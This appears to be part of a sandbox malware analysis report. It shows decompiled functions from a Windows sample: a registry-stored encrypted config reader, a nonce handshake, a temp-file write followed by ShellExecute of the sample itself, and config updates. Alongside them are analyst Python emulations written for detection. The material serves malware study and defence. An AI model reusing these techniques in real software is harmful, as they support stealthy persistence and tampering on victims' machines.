                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1586453840-2980165447
                                                                                • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
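The RegQueryValueExA loop above reassembles a blob that is stored as a run of numbered registry values under HKEY_CURRENT_USER (RegOpenKeyExA is called with 0x80000001 and access 0x20119, i.e. KEY_READ | KEY_WOW64_64KEY). Each iteration formats the next index as a decimal value name (E0040F1ED with radix 0xa), asks for at most the remaining number of bytes, and appends the result; the loop ends on a query failure, on an empty value, or once the remaining counter hits zero, and only an exact fill is accepted before the blob is passed to E00402544 with the constants 0xe4 and 0xc8. The following Python re-implements that loop against a dict standing in for the registry so an analyst can check a dumped set of values offline. It is an added example written for this report, not code from the sample or from Joe Sandbox; the value-name scheme (fixed prefix plus decimal index) and the expected total size are assumptions, and the decryption step is not reproduced.

```python
"""Emulation of the chunked RegQueryValueExA loop in the function above.

Added analyst example; not code from the report or from the sample.  The
registry is replaced by a dict so the logic runs offline.  Assumed, because the
listing does not show it: the value name is a fixed prefix followed by the
decimal index that E0040F1ED(_v8, ..., 0xa) formats, and `total` is the size
the loop's remaining counter (_t89) starts from."""

from typing import Dict, Optional


def read_chunked(values: Dict[str, bytes], prefix: str, total: int) -> Optional[bytes]:
    """Reassemble prefix0, prefix1, ... into exactly `total` bytes.

    Stop conditions mirror the listing: a failed query breaks the loop (a chunk
    larger than the remaining room would make RegQueryValueExA return
    ERROR_MORE_DATA, which is a failure), an empty chunk breaks it, and the loop
    also ends once the remaining counter drops to zero.  Only an exact fill
    (remaining == 0) is accepted; the sample then decrypts the buffer in place
    with E00402544(buf, buf, ..., 0xe4, 0xc8), which is not reproduced here."""
    out = bytearray()
    remaining = total
    index = 0
    while True:
        chunk = values.get(f"{prefix}{index}")
        if chunk is None or len(chunk) > remaining:   # RegQueryValueExA != 0
            break
        if len(chunk) == 0:                            # cbData came back as 0
            break
        out += chunk
        remaining -= len(chunk)
        index += 1
        if remaining > 0:
            continue
        break
    return bytes(out) if remaining == 0 else None


def split_into_values(blob: bytes, prefix: str, chunk_size: int) -> Dict[str, bytes]:
    """Inverse helper for building constructed test input: store `blob` as
    consecutive numbered values of at most `chunk_size` bytes each."""
    return {f"{prefix}{i}": blob[off:off + chunk_size]
            for i, off in enumerate(range(0, len(blob), chunk_size))}


if __name__ == "__main__":
    # Constructed sample: a 20-byte blob spread over three values cfg0..cfg2.
    sample = split_into_values(bytes(range(20)), "cfg", 8)
    print(read_chunked(sample, "cfg", 20))   # exact fill -> the blob
    print(read_chunked(sample, "cfg", 12))   # cfg1 does not fit -> None
```

When replaying real registry dumps, the only inputs needed are the value prefix and the expected size; a None result means the chunks do not add up to the size the sample expects, which is the same condition under which the sample skips its decryption and parsing step.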

                                                                                C-Code - Quality: 100%
                                                                                			E00404280(void* __ecx, intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				unsigned int _v12;
                                                                                				unsigned int _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				signed int _t35;
                                                                                				signed int _t38;
                                                                                				signed int _t40;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t73;
                                                                                				intOrPtr* _t74;
                                                                                
                                                                                				_t68 = __ecx;
                                                                                				_t35 = CreateEventA(0, 1, 1, 0);
                                                                                				_v8 = _t35;
                                                                                				if(_t35 != 0) {
                                                                                					_t38 = E00404000(E00403ECD(_t68),  &_v20);
                                                                                					if(_t38 == 0) {
                                                                                						L11:
                                                                                						_t40 = CloseHandle(_v8) | 0xffffffff;
                                                                                						L12:
                                                                                						return _t40;
                                                                                					}
                                                                                					_t67 = _v20;
                                                                                					_t40 = _t38 | 0xffffffff;
                                                                                					if(_t67 == _t40) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v16 = E0040ECA5();
                                                                                					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
                                                                                					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
                                                                                						CloseHandle(_t67);
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_v12 = _v12 + (_v12 >> 2);
                                                                                						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
                                                                                						_v28 = 1;
                                                                                						_t73 = 0xc;
                                                                                						_v24 = 1;
                                                                                						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
                                                                                						_t74 = E0040EBCC(_t73);
                                                                                						 *_t74 = 0x61;
                                                                                						 *((intOrPtr*)(_t74 + 4)) = 2;
                                                                                						if(_a4 != 0) {
                                                                                							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
                                                                                							 *0x41215a =  *0x41215a + 1;
                                                                                						} else {
                                                                                							 *(_t74 + 8) = 1;
                                                                                						}
                                                                                						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
                                                                                						E0040EC2E(_t74);
                                                                                						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
                                                                                						CloseHandle(_v8);
                                                                                						CloseHandle(_t67);
                                                                                						_t40 = 0 | _a4 == 0x00000000;
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				return _t35 | 0xffffffff;
                                                                                			}
                                                                                Instruction addresses (one per C line above, 0x00000000 for labels and jumps): 0x00404280 0x00404290 0x00404296 0x0040429b 0x004042b1 0x004042ba 0x004043c1 0x004043ca 0x004043cd 0x00000000 0x004043ce 0x004042c0 0x004042c3 0x004042c8 0x00000000 0x00000000 0x004042dc 0x004042e6 0x00404300 0x004043bb 0x00000000 0x00404318 0x00404322 0x0040432c 0x00404333 0x00404336 0x00404342 0x00404345 0x00404350 0x00404359 0x0040435f 0x00404366 0x00404371 0x00404375 0x00404368 0x00404368 0x00404368 0x00404384 0x0040438a 0x0040439a 0x004043ab 0x004043ae 0x004043b5 0x00000000 0x004043b5 0x00404300 0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
                                                                                • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateEvent
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1371578007-2980165447
                                                                                • Opcode ID: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction ID: 96190e95dfac0256a72039fb05246d043f10f1ed4b28fe2ef93a25e2cd6a7057
                                                                                • Opcode Fuzzy Hash: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction Fuzzy Hash: D94181B1900209BADB109BA2CD45FDFBFBCEF40355F104566F604B21C1D7789A51DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
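E00404280 above is a small request/response exchange with another component over the handle that E00404000 opens: the function sends a 32-bit value obtained from E0040ECA5, reads 4 bytes back and requires them to equal value + (value >> 2), applies the same transform to the reply and sends it, then sends an 8-byte header of two dwords (1, 1) and a 12-byte record {0x61, 2, flag}, where flag is 1 when the argument _a4 is zero and 0 otherwise, before reading a final 4-byte answer and closing both handles. Every read and write carries the event from CreateEventA and a timeout of 0x7d0 (2000 ms). The Python below plays both ends of that exchange on constructed values, which is what an analyst needs to build a fake peer or a detection for the traffic. It is an added example for this report, not code from the sample or from Joe Sandbox; that E00403F18 and E00403F8C are the write and read primitives, that E0040ECA5 returns a tick-count style nonce, and that the record is sent as all 12 bytes (the listing's length argument for that write is ambiguous) are assumptions.

```python
"""Emulation of the exchange performed by E00404280 above.

Added analyst example; not code from the report or from the sample.
Assumptions not visible in the listing: E00403F18/E00403F8C are write/read
with the 0x7d0 ms timeout, E0040ECA5 yields a 32-bit nonce (tick-count style),
and the 12-byte record is sent whole.  All values are constructed and the
exchange runs offline."""

import struct

MASK32 = 0xFFFFFFFF
TIMEOUT_MS = 0x7D0     # timeout passed to every read/write in the listing
RECORD_TYPE = 0x61     # first dword of the 12-byte record (E0040EBCC(0xc))
RECORD_SUB = 0x02      # second dword of the record


def step(x: int) -> int:
    """The transform both peers apply: x + (x >> 2), truncated to 32 bits."""
    return (x + (x >> 2)) & MASK32


def client_open(nonce: int) -> bytes:
    """First write from the sample: the raw 4-byte nonce (_v16)."""
    return struct.pack("<I", nonce & MASK32)


def server_reply(first: bytes) -> bytes:
    """The peer answers with step(nonce)."""
    (nonce,) = struct.unpack("<I", first)
    return struct.pack("<I", step(nonce))


def client_verify(nonce: int, reply: bytes) -> bool:
    """The sample's check: reply (_v12) must equal nonce + (nonce >> 2)."""
    (got,) = struct.unpack("<I", reply)
    return got == step(nonce)


def client_payload(reply: bytes, a4: int) -> bytes:
    """Remaining writes: step(reply), the (1, 1) header, then the record."""
    (r,) = struct.unpack("<I", reply)
    flag = 0 if a4 != 0 else 1      # *(_t74 + 8) is cleared when _a4 != 0, else 1
    return (struct.pack("<I", step(r))
            + struct.pack("<II", 1, 1)
            + struct.pack("<III", RECORD_TYPE, RECORD_SUB, flag))


def server_accept(nonce: int, payload: bytes):
    """Peer side: confirm the second transform and parse header and record.

    Returns the parsed record, or None when the proof or the framing is wrong."""
    if len(payload) < 24:
        return None
    (proof,) = struct.unpack_from("<I", payload, 0)
    if proof != step(step(nonce)):
        return None
    header = struct.unpack_from("<II", payload, 4)
    record = struct.unpack_from("<III", payload, 12)
    if header != (1, 1) or record[0] != RECORD_TYPE or record[1] != RECORD_SUB:
        return None
    return {"flag": record[2]}


def run_handshake(nonce: int, a4: int):
    """Drive both peers; returns (sample's return value, record seen by peer)."""
    reply = server_reply(client_open(nonce))
    if not client_verify(nonce, reply):
        return -1, None             # the listing returns 0xffffffff on mismatch
    record = server_accept(nonce, client_payload(reply, a4))
    ret = 1 if a4 == 0 else 0       # _t40 = 0 | (_a4 == 0)
    return ret, record


if __name__ == "__main__":
    print(run_handshake(0x12345678, 0))   # constructed nonce
```

The check is only a round-trip of a fixed arithmetic transform, so a fake peer needs nothing but step() to satisfy the sample; conversely, two consecutive 4-byte values on a channel where the second equals the first plus a quarter of it (32-bit wrap included) are a cheap signature for the exchange.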

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02086CE4
                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02086D22
                                                                                • GetLastError.KERNEL32 ref: 02086DA7
                                                                                • CloseHandle.KERNEL32(?), ref: 02086DB5
                                                                                • GetLastError.KERNEL32 ref: 02086DD6
                                                                                • DeleteFileA.KERNEL32(?), ref: 02086DE7
                                                                                • GetLastError.KERNEL32 ref: 02086DFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                • String ID:
                                                                                • API String ID: 3873183294-0
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: fe4433eadbd31d18ee42961d663043fa0a56f98e78af0b2e23499641ddf44b50
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: 3231CE72D00349BFCB01AFA4DC84ADF7FBDEB48210F158475E191E3251E77286849B61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00409145(void* __eflags) {
                                                                                				char _v264;
                                                                                				char _v1288;
                                                                                				char* _t13;
                                                                                				void* _t20;
                                                                                				void* _t23;
                                                                                				void* _t29;
                                                                                
                                                                                				_t29 = __eflags;
                                                                                				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
                                                                                				CharToOemA( &_v264,  &_v264);
                                                                                				_t13 =  &_v264;
                                                                                				_push(_t13);
                                                                                				_push(_t13);
                                                                                				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
                                                                                				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                				_t20 = E00409064(_t29,  &_v1288,  &_v264);
                                                                                				if(_t20 != 0) {
                                                                                					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
                                                                                				}
                                                                                				return _t20;
                                                                                			}
                                                                                Instruction addresses (one per C line above, 0x00000000 for labels and jumps): 0x00409145 0x00409166 0x00409174 0x0040917a 0x00409180 0x00409181 0x004091a9 0x004091b6 0x004091c9 0x004091d3 0x00000000 0x004091e1 0x004091ea

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                • CharToOemA.USER32 ref: 00409174
                                                                                • wsprintfA.USER32 ref: 004091A9
                                                                                  • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                  • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                  • Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                  • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                  • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                  • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3857584221-2980165447
                                                                                • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 020893C6
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 020893CD
                                                                                • CharToOemA.USER32(?,?), ref: 020893DB
                                                                                • wsprintfA.USER32 ref: 02089410
                                                                                  • Part of subcall function 020892CB: GetTempPathA.KERNEL32(00000400,?), ref: 020892E2
                                                                                  • Part of subcall function 020892CB: wsprintfA.USER32 ref: 02089350
                                                                                  • Part of subcall function 020892CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02089375
                                                                                  • Part of subcall function 020892CB: lstrlen.KERNEL32(?,?,00000000), ref: 02089389
                                                                                  • Part of subcall function 020892CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 02089394
                                                                                  • Part of subcall function 020892CB: CloseHandle.KERNEL32(00000000), ref: 0208939B
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02089448
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3857584221-2980165447
                                                                                • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction ID: 2e060224dcb71bbabad60b893cf483993aae151987f228b44cee016a6e6d59ab
                                                                                • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction Fuzzy Hash: 8E015EF69002587BDB21A7619D8DEEF3B7CDB95701F0040A2BB49E2080EAB497C58F75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: $localcfg
                                                                                • API String ID: 1659193697-2018645984
                                                                                • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction ID: 580edfd530c70db6533a615802e04309f00183adbe2bc6f23c84ccf8a4ece042
                                                                                • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction Fuzzy Hash: C8715B71B00304AADF72BB54DC85FEF3BA99B00718F244027FA85E6890EF7695C4AB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
                                                                                				CHAR* _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				CHAR* _v20;
                                                                                				intOrPtr _v24;
                                                                                				CHAR* _v28;
                                                                                				CHAR* _v32;
                                                                                				intOrPtr _v36;
                                                                                				char _v37;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr _t95;
                                                                                				int _t126;
                                                                                				void* _t136;
                                                                                				void* _t138;
                                                                                				CHAR* _t139;
                                                                                				void* _t146;
                                                                                				char _t150;
                                                                                				void* _t154;
                                                                                				void* _t158;
                                                                                				void* _t159;
                                                                                
                                                                                				_t146 = __edx;
                                                                                				_v20 = 0;
                                                                                				E0040DD05();
                                                                                				_t150 = _a4;
                                                                                				_t158 = E0040DD84(_t150, _a8);
                                                                                				_pop(_t138);
                                                                                				if(_t158 != 0) {
                                                                                					L2:
                                                                                					_t16 = _t158 + 0x30; // 0x30
                                                                                					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
                                                                                					_t21 = lstrlenA(_a12) + 1; // 0x1
                                                                                					_t136 = _t21;
                                                                                					_t87 = lstrlenA(_a16) + _t136 + 1;
                                                                                					_v16 = _t87;
                                                                                					if(_v8 == 0) {
                                                                                						_t139 =  *((intOrPtr*)(_t158 + 0x24));
                                                                                						_v12 = _v12 & 0x00000000;
                                                                                						_v8 = _t139;
                                                                                						_t152 = _t139;
                                                                                					} else {
                                                                                						_t126 = lstrlenA(_v8);
                                                                                						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                						_v12 = _t126 + _t136 + 1;
                                                                                						_t87 = _v16;
                                                                                						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                					}
                                                                                					if(_v12 == _t87) {
                                                                                						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
                                                                                						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
                                                                                						_t77 = _t158 + 0x30; // 0x30
                                                                                						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
                                                                                						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
                                                                                							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
                                                                                							 *0x4136c0 = 1;
                                                                                						}
                                                                                					} else {
                                                                                						_t41 = _t87 + 0x24; // 0x24
                                                                                						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
                                                                                						if(_t154 != 0) {
                                                                                							_t43 = _t158 + 0xc; // 0xc
                                                                                							E0040EE08(_t154, _t43,  &(_v8[0x24]));
                                                                                							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
                                                                                							_v20 =  &(_v8[_t154]);
                                                                                							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
                                                                                							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
                                                                                							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
                                                                                							_t66 = _t154 + 0x24; // 0x24
                                                                                							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
                                                                                							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
                                                                                							E0040EC2E(_t154);
                                                                                							_v20 = 1;
                                                                                						}
                                                                                					}
                                                                                					L10:
                                                                                					E0040DD69();
                                                                                					return _v20;
                                                                                				}
                                                                                				_v56 = _t150;
                                                                                				_v28 = 0;
                                                                                				_v24 = 3;
                                                                                				lstrcpynA( &_v52, _a8, 0x10);
                                                                                				_v37 = 0;
                                                                                				_v32 = 0;
                                                                                				_v36 = E004024C2( &_v20, 0, 0);
                                                                                				E0040DF4C(_t146,  &_v56);
                                                                                				_t158 = E0040DD84(_t150, _a8);
                                                                                				_t159 = _t159 + 0x18;
                                                                                				if(_t158 == 0) {
                                                                                					goto L10;
                                                                                				}
                                                                                				goto L2;
                                                                                 			}

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                  • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                • String ID: flags_upd$localcfg
                                                                                • API String ID: 204374128-3505511081
                                                                                • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0208DF6C: GetCurrentThreadId.KERNEL32 ref: 0208DFBA
                                                                                • lstrcmp.KERNEL32(00410178,00000000), ref: 0208E8FA
                                                                                • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02086128), ref: 0208E950
                                                                                • lstrcmp.KERNEL32(?,00000008), ref: 0208E989
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 2920362961-1846390581
                                                                                • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction ID: 0e130995b376facff2f863763d52b2beeb73cc9b622ce95781bb4352be93b439
                                                                                • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction Fuzzy Hash: EA319E31A00715EBDBB2AF24C884BAB7BE4EB05724F00892AF5D587551D7B0E880EB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction ID: f6772974e50ec96c48ce860673332e4777531919152353c2b25b63134c9cb243
                                                                                • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction Fuzzy Hash: 7C214D73104219BFDB11BB64FC49EDF3FAEDB49264B118425F542D1091EB71DA40A674
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E0040DD05() {
                                                                                 				long _t4;
                                                                                 				long _t10;
                                                                                 
                                                                                 				_t10 = GetTickCount();                                   // start of the wait budget (unsigned tick arithmetic below)
                                                                                 				while(InterlockedExchange(0x4136b4, 1) != 0) {           // 0x4136b4 is the lock word; a non-zero old value means it is already held
                                                                                 					if(GetCurrentThreadId() !=  *0x4136b8) {                // 0x4136b8 is the owning thread id; the owner re-enters without waiting
                                                                                 						if(GetTickCount() - _t10 >= 0x2710) {               // 0x2710 = 10000 ms: after 10 s a waiter takes the lock whether or not it was released
                                                                                 							 *0x4136bc =  *0x4136bc & 0x00000000;            // 0x4136bc is the recursion count; reset for the new owner
                                                                                 						} else {
                                                                                 							Sleep(0);                                       // yield and spin again
                                                                                 							continue;
                                                                                 						}
                                                                                 					}
                                                                                 					L7:
                                                                                 					_t4 = GetCurrentThreadId();
                                                                                 					 *0x4136bc =  *0x4136bc + 1;                            // one more level of ownership
                                                                                 					 *0x4136b8 = _t4;                                       // record the holder
                                                                                 					return _t4;
                                                                                 				}
                                                                                 				goto L7;                                                 // lock was free: do the same bookkeeping
                                                                                 			}
